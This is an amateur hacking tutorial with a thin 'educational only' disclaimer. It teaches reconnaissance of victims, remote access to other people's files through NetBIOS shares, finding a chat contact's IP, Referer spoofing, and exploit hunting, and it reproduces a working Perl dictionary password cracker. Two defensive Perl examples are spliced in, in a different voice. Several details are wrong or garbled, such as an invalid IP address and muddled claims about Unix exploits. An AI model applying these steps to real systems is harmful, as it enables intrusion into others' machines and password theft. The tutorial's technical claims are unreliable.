############################################################################################################
DISCLAIMER: This paper is for educational purposes only, I take no responsibility for your actions. Any trouble you get into is your own fault. This may be used on websites but proper credit must be given. DO NOT use information found in this paper to hack anything; this information is only for the knowledge of how to secure your own servers.
############################################################################################################

Part one: Exploits, Websites, IP's, Perl, and any other informative stuff
by 7he gener@l

1a) Retrieving information on a host
1b) Using exploits
1c) Hacking websites
1d) Finding people's IP's
1e) Creating Perl scripts
1f) Testing your own security

1a) Retrieving information on a host

First of all I am going to show you how to retrieve information from a host. Please note that this is vital if you are going to hack anything at all. All computers, networks and web servers are hacked by gathering information and finding a security hole; the results of this can be many things, such as getting passwords and other vital information, or giving you access to whatever you are hacking. Without this first step you most probably won't be able to hack the host.

OK, as an example of retrieving information we will look at the following. If you ever receive spam (or any other email you'd wish to use), take a close look at the mail you receive. I take a look at the headers (using Outlook Express as an example) and this is what I see (the important part only):

    Received: from ahpsecu([193.256.172.60]) by mc12-f15.hotmail.com with Microsoft SMTPSVC(5.0.2195.6824);

Now I take a look at the number and notice that it is an IP (Internet Protocol address, for any noobs out there). So then I port scan the IP. What is a port scanner, you ask?
Well, 99% of the time it is a program that tries to access all the ports and checks which ports are open on a server (ports can also be thought of as doors). You can get a port scanner from http://www.tgs-security.com/. Now I scan the IP and I find that the following ports are open: 21, 22, 80, 139, 8080. Port 21 is used for FTP (File Transfer Protocol), port 22 is SSH, port 80 is HTTP (Hyper Text Transfer Protocol), port 139 is NetBIOS ssn, and port 8080 is an HTTP proxy.

Just a note: port scanning is easily detected, and you could get kicked off your ISP (internet service provider) if the sysop who checks the logs is a bit of a dick and reports it all. (Although that is highly unlikely, be sure to use the proxies I mentioned earlier.)

Now here is the interesting bit: NetBIOS is open, and this allows us to access their hard drive remotely. So now I go into command prompt (Start > Run > command) and a very unattractive black screen comes up (can you believe it's an operating system from the 1980's?). In command prompt I type this command:

    nbtstat -A 193.256.172.60

and this is what I get:

    Name          Type    Status
    Host          <20>    UNIQUE    Registered
    Hostbug       <00>    GROUP     Registered
    Host machine  <03>    UNIQUE    Registered

Do you see the type <20>? That is what we need; it means that file sharing is enabled on the server. Here (for future reference) is a list of other types that can appear. The values in the brackets (under "Type") can be:

    00  base computer names and workgroups, also in "*" queries
    01  master browser, in the magic __MSBROWSE__ cookie
    03  messaging/alerter service; name of logged-in user
    20  resource-sharing "server service" name
    1B  domain master-browser name
    1C  domain controller name
    1E  domain/workgroup master browser election announcement

OK, so what we know so far is that the host has port 139 open and that it allows file sharing.
Now if I go to Start > Search and type in "lmhosts.sam", a file should appear. Open it with Notepad (being sure NOT to check the box "Always use this program to open this file type", or whatever it says). Once open you will see a bunch of instructions on what to do; you can read them if you want, or you can go straight to the bottom and type in (as an example again):

    193.256.172.60 Host

All this is, is the IP and the share name (the word under "Name"). Close the file and go to Start > Search > Computer, then type in the IP. If this is done correctly (as well as the entry in the lmhosts.sam file), and file sharing is still enabled on the computer, the computer's IP should show up, and then you can most probably just go through the computer like it's your own.

Now I will use a handy little program called telnet. To access this go to Start > Run > telnet, and another black window should appear. Since we know the host has port 21 open we will telnet to that port by giving the command:

    o 193.256.172.60 21

All this command is: "o" for open, "193.256.172.60" is the IP you want to connect to, and "21" is the port you want to connect to, so in this case it is FTP (NOTE: "o" is for anyone who is running XP). I hit enter and I get this response:

    220 Serv-U FTP-Server v2.5k for WinSock ready...

Serv-U is a Windows FTP server, and it's also given away in "WinSock". So you ask "What do I do now?" Well, if you want to hack this server (not the example, I mean a real one), you could search google.com for exploits for that server.

Some basic things to protect YOU (although I can't guarantee you will be protected 100% of the time) are: a firewall (I recommend BlackIce), and a program that listens on the open ports of your computer, which also shows who is connected to that port and the program (if one is running on it) that is being used on the port.
Some other information-seeking programs are things like tracert (type it in command prompt to show a list of options), and ping (again, type it in command prompt to show a list of options; this should also be used before you look up information on the host, to make sure it is alive). Another thing that is fairly important is to find out what server software a website runs on. This isn't a real challenge, as they usually give out that information by themselves, just by asking for a file that doesn't exist on the site.

1b) Using exploits

First off, what are exploits? Well, basically they are programs that "exploit" a bug in a piece of software. There are many exploits all doing different things, and they all exploit different bugs, which is why different exploits must be run against specific programs. There are all different types of exploits, such as ones that get root on different OS's (operating systems); there are also types that will get the ID of a web server, which is done when the software whose bugs are being exploited is running as root. On Unix systems exploits crash the software that is running as root, because on Unix systems the software has to run as root, as it can't run a task as another user. All you really need to do is find a compiler for the language that the exploit is written in and you're in business.

1c) Hacking websites

First off, we must find the server type and version; this way we may be able to find vulnerabilities. Open up command prompt and a black, ugly-looking window should pop up. First we make sure that the victim you want hacked is alive. To do this, once we are in command prompt we type:

    ping www.victim.com

(changing victim.com to the domain you are hacking). By checking the reply times we will know whether the victim is alive or not. Now that we know it is alive we port scan the victim. I use Blues port scanner, which can be found at http://www.tgs-security.com/.
Once you have it, start it up and you're in business. Now type in the victim's domain name in both of the boxes (start and end) and click scan. Once the scan is finished you should have a list of results; as an example we would get this:

    TCP iphere 21
    TCP iphere 80
    TCP iphere 135

Now I see that the victim has port 80 open, as well as 21 (FTP) and 135 (NetBIOS). So we now know that the victim is alive and has port 80 open, so what now? Well, we are going to use a program called telnet. I'm not going to go through the history of it, or go into detail on how to use it, but a tutorial can be found at tgs-security. So now start up command prompt again and type:

    telnet www.victim.com 80

and hit enter; the screen should go blank. Now once this is done, you can type in different pages you want to view, but for this example we want to find the server type, so to do this we try to get a file that is not even there, by typing:

    Get ialed

and pressing enter twice, and you should see something like this:

    Date: Thu, 21 Mar 2004 20:46:52 GMT
    Server: Apache/1.3.26 (Unix) mod_perl/1.27
    Connection: Close
    Content-Type: text/html; charset=iso-8859-1

plus a lot of other junky source code crap. So now we know:

- the victim is alive (by using ping)
- port 80 is open on the victim (we found this using a port scanner)
- what server the target is running (in this example it's Apache/1.3.26 (Unix) mod_perl/1.27)
- the target charset is iso-8859-1

So now that we have found the versions, what do we do? Well, we search for vulnerabilities. When searching for vulnerabilities, you can do it manually or use a program (which is easier). You can find a recent list of vulnerabilities at http://www.tgs-security.com and http://www.securityfocus.com/. So now we will do a vulnerability scan on the target. The tool I'm going to use for this example is Retina, which can be found at http://www.eEye.com/; this is a 16 meg program that is worth the download. I will quickly run through it.
The program is split up into four "sections":

- Browser
- Miner
- Scanner
- Tracer

OK, now I'll go through each part of the program in a bit of detail.

- Browser: well, take a guess. This is quite simple, it's just a browser within the program.
- Miner: this runs through about 20-30 thousand vulnerabilities, so your chances of finding one are fairly good.
- Scanner: this will scan a victim for vulnerabilities.
- Tracer: this basically does a trace route to the victim.

OK, so now here comes the good bit. Go into scanner mode, type your victim's address in the address box and press OK. It will then run a ping scan, trace scan, OS detection, port scan and vulnerability scan. After the scan is completed you might get a list of vulnerabilities; if you do, there should be a marker next to each of them, in 3 colours: green, orange and red. Green means it can give out some information, orange is a medium risk level and red is a high risk level. If you select an audit you can get more information on the vulnerability; also scroll down to find more information such as open ports and OS versions. From that you go off and find an exploit and use it. That's it for this section, as I'm not going to go into full detail.

1d) Finding people's IP's

Finding people's IP's is a lot easier than hacking someone (obviously). The first way, as I mentioned earlier, is through email, by looking at the headers, but this may not be effective if the victim is using an encrypted proxy. The next one is by making a direct connection with the victim. This way can be used in an instant messenger program; I'll be using MSN. First open up command prompt and type:

    netstat -n

This will give you a list of ports that are connected. Now send a file to the victim and make them accept. Once that is done and it is transferring, type the command in again in command prompt, and you should have an extra port open (it should be in the 6000's). From there work out which IP is your victim's, and there you go.
Another way, which is way too obvious and completely stupid (unless the guy is a total dumbass), is using a program to get the IP, but this usually shows the IP in their window as well as yours. You could also go to their computer and type winipcfg in Start > Run, or go to a site such as whatsmyip.com to get it, but this is once again too obvious.

1e) Creating Perl scripts

Tainting - In Perl scripts, if you have ever seen one, the very first line is the path of the program, such as:

    #!/usr/local/bin/perl -w

The -w tells the program to give warnings if any errors are found in the code. What is going to happen is that we are going to disallow a user from using insecure commands; the way it works is that the user can't execute a command, but any variable that's created in the script can. To enable tainting, add -T to the first line so it ends up like this:

    #!/usr/local/bin/perl -Tw

You can untaint a variable by copying the part of it that matched a regular expression capture into a variable, for example $input = $1. The following script parses user input and, if it doesn't contain dangerous characters, tells Perl it is secure:

    if ($input =~ /^([-\@\w.]+)$/) {   # if $input contains none of the dangerous characters
        $input = $1;                   # $input is now untainted
    } else {
        die "Bad data in $input";      # log this somewhere
    }

Strict - use strict; This command tells the script that from now on all subs and variables MUST be declared before use. This will secure your script, but it is a lot harder to write. Give the command no strict; to disable it.

Setuid - This is a Unix mechanism that allows the Perl script to have rights above those of whoever is running it. To suid a script, log into the account through telnet and change to the folder with the script; once done, type the command:

    chmod u+s scriptname.pl

There are bugs in many Unix systems that will make a Perl script crash when you try to run a suid script. To get around this we use "C wrappers", which are programs written in C that execute a Perl script.
Here is an example:

    #include <unistd.h>

    int main(void)
    {
        /* run the Perl interpreter on the script; the second argument is the name it sees as $0 */
        execl("/usr/local/bin/perl", "scriptname.pl",
              "/local/web/cgi-bin/scriptname.pl", (char *)NULL);
        return 1;   /* only reached if execl() failed */
    }

Checking the user - Restrictions on web pages can be made by the IP of the computer (making it, for example, so only local users can access them). In Perl, $ENV{HTTP_REFERER} is the page the browser was sent from, and $ENV{REMOTE_ADDR} is its IP. Example:

    #!/usr/local/bin/perl
    $input = <STDIN>;
    chomp $input;                 # drop the trailing newline so the comparison works
    if ($input eq "password") {
        print "Correct password";
        if ($ENV{REMOTE_ADDR} eq "127.0.0.1") {
            print "Correct IP";
        }
    }

What this script does is check that the password given as input is correct and that the computer connecting has the IP 127.0.0.1. This is not 100% effective, because the referrer can be faked, and so can the IP. Usually the Perl script will require an IP the same as the server's, so to fake it go to command prompt, type ping www.server.com and get the IP. Now to fake the referrer, go to command prompt again and telnet to the server you want to download the file from. So type "telnet www.server.com 80" (substituting server.com for the real name). Using the get command, get the file called /env_check.htm (so the command will be get /env_check.htm). Instead of hitting enter twice, hit it once and type "Referer: http://madeup.com/fake/refferer.html". Then hit enter. The IP is a bit harder to get, but by reading the script they can get the IP, so for this we will use the encryption function.

crypt() Function - This function is a built-in encryption. An example is $try = crypt("pop", "aa"). What this does is encrypt the input using "aa" as the key (the salt). The result is then checked against the result of encrypting "pop" with "aa". Here is a script, which was taken from Tyler Lu's Unix password cracker, as I thought it would be a good example.
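Before that script, an added example of my own (not from the tutorial and not Tyler Lu's code) that puts the tainting part of 1e and crypt() together the way a login script would use them: the username is untainted with the tutorial's regex and the password is checked against a stored hash, taking the salt from the hash instead of hard-coding it. The user table and its passwords are constructed for the demo; Scalar::Util is a core module, and the script has to be started with perl -T.

```perl
#!/usr/bin/perl -T
# Added example (not from the tutorial): the untaint regex from 1e and
# crypt() used for checking a password rather than guessing one.
# Run it as:  perl -T check.pl USER PASSWORD
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Constructed demo table of users, standing in for a real passwd/shadow
# file. The hashes are made here with the tutorial's DES salt "aa"; any
# crypt(3) format works, because the salt is taken from the stored hash.
my %stored = (
    alice => crypt('pop',    'aa'),
    bob   => crypt('s3cret', 'aa'),
);

# Under -T everything from @ARGV, STDIN and %ENV is tainted, so it cannot
# be used in open-for-write, system, exec or backticks until untainted.
my ($user, $pass) = @ARGV;
die "Usage: perl -T check.pl USER PASSWORD\n" unless defined $pass;
print "username tainted before check: ", (tainted($user) ? 'yes' : 'no'), "\n";

# Untaint the username exactly as 1e shows: keep only what matches the
# whitelist. Anything else is rejected rather than cleaned up.
my $clean_user;
if ($user =~ /^([-\@\w.]+)$/) {
    $clean_user = $1;               # a regex capture is untainted
} else {
    die "Bad data in username\n";   # log this somewhere
}
print "username tainted after check:  ", (tainted($clean_user) ? 'yes' : 'no'), "\n";

# The password is never untainted: it is only compared, never used to
# touch the outside world, so taint mode has nothing to object to.
exit(check_password($clean_user, $pass) ? 0 : 1);

# Hash the offered password with the salt of the stored hash and compare;
# the stored value itself serves as the salt argument to crypt().
sub check_password {
    my ($u, $p) = @_;
    return 0 unless exists $stored{$u};     # unknown user
    my $hash = $stored{$u};
    return crypt($p, $hash) eq $hash ? 1 : 0;
}
```

Tyler Lu's cracker, as quoted by the tutorial, follows.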
    #!/usr/bin/perl
    if ($#ARGV < 1) {
        print "\nUsage: perlcrack passwd_file dictionary_file\a\n";
        exit;
    }
    ##################### Filenames #########################
    $passwd = $ARGV[0];
    $dict   = $ARGV[1];
    ################### Do subroutines ######################
    dictionary();
    passwords();
    ################## Dictionary Subroutine #################
    sub dictionary {
        open(DICT, $dict) or die("\nERROR: unable to open $dict\a\n");
        while (<DICT>) {
            @_words = split;
            push @words, [@_words];
        }
        print "\ngot dictionary file: $dict";
        close(DICT);
        print "\n";
    }
    ################## Passwords Subroutine ###################
    sub passwords {
        open(PASSWD, $passwd) or die("\nERROR: unable to open $passwd\a\n");
        print "got passwd file: $passwd\n";
        print "\nbrute forcing...\n\n";
        while (<PASSWD>) {
            ($user, $encrypt, $uid, $gid, $gecos, $home, $shell) = split(/:/);
            print "Encrypted password:-- ";
            print $encrypt;
            $crk = "no";
            crack();    # execute crack subroutine
            if ($crk eq "no") {
                $status   = "unable to crack";
                $password = "X";
                write;
            }
        }
        close(PASSWD);
        print "\n";
    }
    ##################### Crack Subroutine ##################
    sub crack {
        for $pass (@words) {
            $try = crypt(@$pass[0], "aa");
            ###print "\nPassword trying:-- ";
            ###print @$pass[0];
            ###print "\nEncrypted:-- ";
            ###print $try;
            ###print "\n\n";
            if ($try eq $encrypt) {
                $status   = "FOUND";
                $password = @$pass[0];
                print "\a";
                write;
                $crk = "yes";
                last;
            }
        }
    }
    #################### Output Format ########################
    format STDOUT =
    @<<<<<<<<<<<<<<<<< @<<<<<<<<<<<<<<<<<
    $status, $password
    .
    format STDOUT_TOP =
    status             password
    ++++++++++++++++++ ++++++++++++++++
    .

Now this is a big script, but basically the longer the password, the longer it takes to crack. That's it for this section.

1f) Testing your own security

Basically the easiest way to test your own security is to do a port scan of 127.0.0.1; all this does is loop back to your own IP address. When scanning you may find different ports open on your computer.
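As an added example of that first step of 1f (mine, not from the tutorial), this Perl script reads netstat -an output, or the constructed sample lines built into it when run without input, and lists every listening TCP port on your own machine, marking the ones bound to all interfaces rather than to 127.0.0.1, since those are the ones another machine could reach. It assumes Perl 5.10 or later for the // operator.

```perl
#!/usr/bin/perl
# Added example (not from the tutorial): lists what is listening on your
# own machine from `netstat -an` output and says which of it is reachable
# from the network, the first question 1f asks about an open port.
# Usage:  netstat -an | perl listening.pl     (or run it alone for the demo)
use strict;
use warnings;

# Service names used in this tutorial; anything else is reported as "?".
my %service = (21 => 'FTP', 22 => 'SSH', 80 => 'HTTP', 139 => 'NetBIOS-ssn',
               8080 => 'HTTP proxy', 5000 => 'see 1f');

# Constructed sample mixing the Windows ("LISTENING") and Unix ("LISTEN")
# line formats so the parser can be tried without a real netstat run.
my @sample = (
    '  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING',
    '  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING',
    '  TCP    192.168.1.5:1054       193.256.172.60:21      ESTABLISHED',
    'tcp        0      0 0.0.0.0:22        0.0.0.0:*      LISTEN',
    'tcp        0      0 127.0.0.1:5000    0.0.0.0:*      LISTEN',
    'tcp6       0      0 :::80             :::*           LISTEN',
);

# Returns one record per listening socket: port, bound address and whether
# the bind address lets other hosts connect (anything but loopback).
sub listening_ports {
    my @lines = @_;
    my (%seen, @out);
    for my $line (@lines) {
        next unless $line =~ /\bLISTEN(?:ING)?\b/;
        # local address is the first addr:port token after the protocol
        # (and after the two queue counters that Unix netstat prints)
        my ($addr, $port) = $line =~ /^\s*\S+\s+(?:\d+\s+\d+\s+)?(\S+):(\d+)\s/
            or next;
        next if $seen{"$addr:$port"}++;
        my $local_only = ($addr =~ /^127\./ || $addr eq '::1');
        push @out, { port => $port, addr => $addr, exposed => !$local_only,
                     name => $service{$port} // '?' };
    }
    return sort { $a->{port} <=> $b->{port} } @out;
}

my @lines = (-t STDIN) ? @sample : <STDIN>;
for my $s (listening_ports(@lines)) {
    printf "port %-5d %-12s bound to %-10s %s\n", $s->{port}, $s->{name},
        $s->{addr}, $s->{exposed} ? 'REACHABLE FROM NETWORK' : 'local only';
}
```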
When you see some open ports you can then figure out what ports they are, what risk there is of someone getting into your computer through them, and then close them. An easy way to close them is by getting a program called Aports (look for it on Google). What this does is show a list of ports that are open and what is being used on each. If you think someone is connected to that port, or a trojan or something is connected to that port (such as port 5000), then you are able to terminate the process, which then closes the port.

This has been another tutorial by 7he gener@l